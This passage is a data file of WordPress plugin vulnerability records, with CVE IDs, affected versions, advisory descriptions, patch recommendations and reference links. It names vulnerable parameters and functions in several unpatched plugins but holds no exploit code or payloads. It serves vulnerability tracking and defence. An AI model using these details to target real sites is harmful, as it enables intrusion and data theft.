link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368977\\\/forminator\\\/trunk\\\/library\\\/class-export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368977\\\/forminator\\\/trunk\\\/library\\\/class-export.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdee0cd8-b83b-4436-aebe-533f5af03ef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdee0cd8-b83b-4436-aebe-533f5af03ef1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4153","slug":"ban-users","versionImpact":"1.5.3","description":"The BAN Users plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.5.3 due to a missing capability check on the 'w3dev_save_ban_user_settings_callback' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify the plugin settings to access the ban and unban functionality and set the role of the unbanned user.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af6bd2db-47a4-4381-a881-d5f97a159f8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af6bd2db-47a4-4381-a881-d5f97a159f8d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L109\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ban-users\\\/tags\\\/1.5.3\\\/include\\\/ajax.php#L199\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4857","slug":"fs-product-inquiry","versionImpact":"1.1.1","description":"The FS Product Inquiry WordPress plugin through 1.1.1 does not sanitise and escape some form submissions, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf1b8434-b361-4666-9058-d9f08c09d083\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf1b8434-b361-4666-9058-d9f08c09d083\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5605","slug":"media-library-assistant","versionImpact":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter within the mla_tag_cloud Shortcode in all versions up to, and including, 3.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba8a9f5-0633-4cf0-af27-5466d93e9020?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ba8a9f5-0633-4cf0-af27-5466d93e9020?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php#L2783\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php#L2783\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/media-library-assistant\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098232%40media-library-assistant&new=3098232%40media-library-assistant&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3098232%40media-library-assistant&new=3098232%40media-library-assistant&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12406","slug":"library-management-system","versionImpact":"3.0.0","description":"The Library Management System \u2013 Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the 'owt7_borrow_books_id' parameter in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L1882\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L1882\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b4cb873-77b7-44f9-820c-38e5d43393f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b4cb873-77b7-44f9-820c-38e5d43393f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12697","slug":"real-kit","versionImpact":"5.1.1","description":"The real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e1f631-28ec-4924-9d69-caaba00fe276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83e1f631-28ec-4924-9d69-caaba00fe276?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12749","slug":"competition-form","versionImpact":"2.0","description":"The Competition Form WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/478316b9-9f47-4aa6-92c6-03879f16a3e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13493","slug":"sensly-online-presence","versionImpact":"0.6","description":"The Sensly Online Presence WordPress plugin through 0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfbdd474-92e5-422b-a185-e441a6014557\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfbdd474-92e5-422b-a185-e441a6014557\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13750","slug":"multilevel-referral-plugin-for-woocommerce","versionImpact":"2.27","description":"The Multilevel Referral Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.27 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multilevel-referral-plugin-for-woocommerce\\\/tags\\\/2.27\\\/classes\\\/referral-program.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multilevel-referral-plugin-for-woocommerce\\\/tags\\\/2.27\\\/classes\\\/referral-program.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4389ddc9-de69-4316-9bfa-ff3bd3346c69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4389ddc9-de69-4316-9bfa-ff3bd3346c69?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11284","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.9. This is due to the plugin not properly validating a user's identity prior to updating their password through the account_settings_save_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8afe386e-1e4f-4668-8309-6d47dedb008a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2802","slug":"layoutboxx","versionImpact":"0.3.1","description":"The LayoutBoxx plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/layoutboxx\\\/trunk\\\/layoutboxx.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/layoutboxx\\\/trunk\\\/layoutboxx.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/layoutboxx\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/layoutboxx\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3fcb8f-f130-4008-8f11-d98efa30f1a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc3fcb8f-f130-4008-8f11-d98efa30f1a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47534","slug":"wp-auto-spinner","versionImpact":"3.25.0","description":"Missing Authorization vulnerability in ValvePress Wordpress Auto Spinner allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wordpress Auto Spinner: from n\/a through 3.25.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-3-25-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-3-25-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5237","slug":"brid-video-easy-publish","versionImpact":"3.8.5","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 3.8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L221\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L221\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309639\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309639\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10333f8-fd90-43a7-8404-71954ee29e47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10333f8-fd90-43a7-8404-71954ee29e47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4118","slug":"woo-altcoin-payment-gateway","versionImpact":"1.7.1","description":"The Bitcoin \/ AltCoin Payment Gateway for WooCommerce & Multivendor store \/ shop WordPress plugin through 1.7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2839ff82-7d37-4392-8fa3-d490680d42c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2839ff82-7d37-4392-8fa3-d490680d42c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2892","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_delete_product function. This makes it possible for unauthenticated attackers to bulk delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36e94e4-b1e8-4803-9377-c4d710b029de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36e94e4-b1e8-4803-9377-c4d710b029de?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4948","slug":"woocommerce-cvr-payment-gateway","description":"The WooCommerce CVR Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the refresh_order_cvr_data AJAX action in versions up to 6.1.0. This makes it possible for authenticated attackers with contributor-level access and above, to update CVR numbers for orders.","refs":"[{\"url\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-cvr-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-cvr-payment-gateway\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f72ba0e2-a9c4-43b0-a01f-185554090162?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f72ba0e2-a9c4-43b0-a01f-185554090162?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50824","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000021","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS.This issue affects Insert or Embed Articulate Content into WordPress: from n\/a through 4.3000000021.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/insert-or-embed-articulate-content-into-wordpress\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000021-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/insert-or-embed-articulate-content-into-wordpress\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000021-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4856","slug":"fs-product-inquiry","versionImpact":"1.1.1","description":"The FS Product Inquiry WordPress plugin through 1.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cf90a27-55e2-4b2c-9df1-5fa34c1bd9d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cf90a27-55e2-4b2c-9df1-5fa34c1bd9d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2090","slug":"remote-content-shortcode","versionImpact":"1.5","description":"The Remote Content Shortcode plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5 via the remote_content shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec93f360-2eed-4858-b36f-8cc17f7b4ac1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec93f360-2eed-4858-b36f-8cc17f7b4ac1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12122","slug":"resads","versionImpact":"2.0.6","description":"The ResAds plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via multiple parameters in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/resads\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/resads\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0a544a-b5f3-41bf-9313-28188662ea56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0a544a-b5f3-41bf-9313-28188662ea56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13746","slug":"booking-calendar-and-notification","versionImpact":"4.0.3","description":"The Booking Calendar and Notification plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to missing capability checks on the wpcb_all_bookings(), wpcb_update_booking_post(), and wpcb_delete_posts() functions in all versions up to, and including, 4.0.3. This makes it possible for unauthenticated attackers to extract data, create or update bookings, or  delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/tags\\\/4.0.3\\\/lib\\\/includes\\\/function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/tags\\\/4.0.3\\\/lib\\\/includes\\\/function.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L188\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422bb9a5-c848-4492-add7-bc65b1111565?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422bb9a5-c848-4492-add7-bc65b1111565?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11283","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to wp_ajax_google_api_login_callback function not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to access arbitrary candidate accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfa487fb-c014-47f1-9537-73881ede30b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfa487fb-c014-47f1-9537-73881ede30b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3433","slug":"advanced-advertising-system","versionImpact":"1.3.1","description":"The Advanced Advertising System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.3.1. This is due to insufficient validation on the redirect url supplied via the 'redir' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-advertising-system\\\/trunk\\\/shortcode.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-advertising-system\\\/trunk\\\/shortcode.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a56589-9dc0-47a7-bb68-e31f84a639ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a56589-9dc0-47a7-bb68-e31f84a639ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4104","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the fed_wp_ajax_fed_login_form_post() function in versions 1.0 to 2.2.6. This makes it possible for unauthenticated attackers to reset the administrator\u2019s email and password, and elevate their privileges to that of an 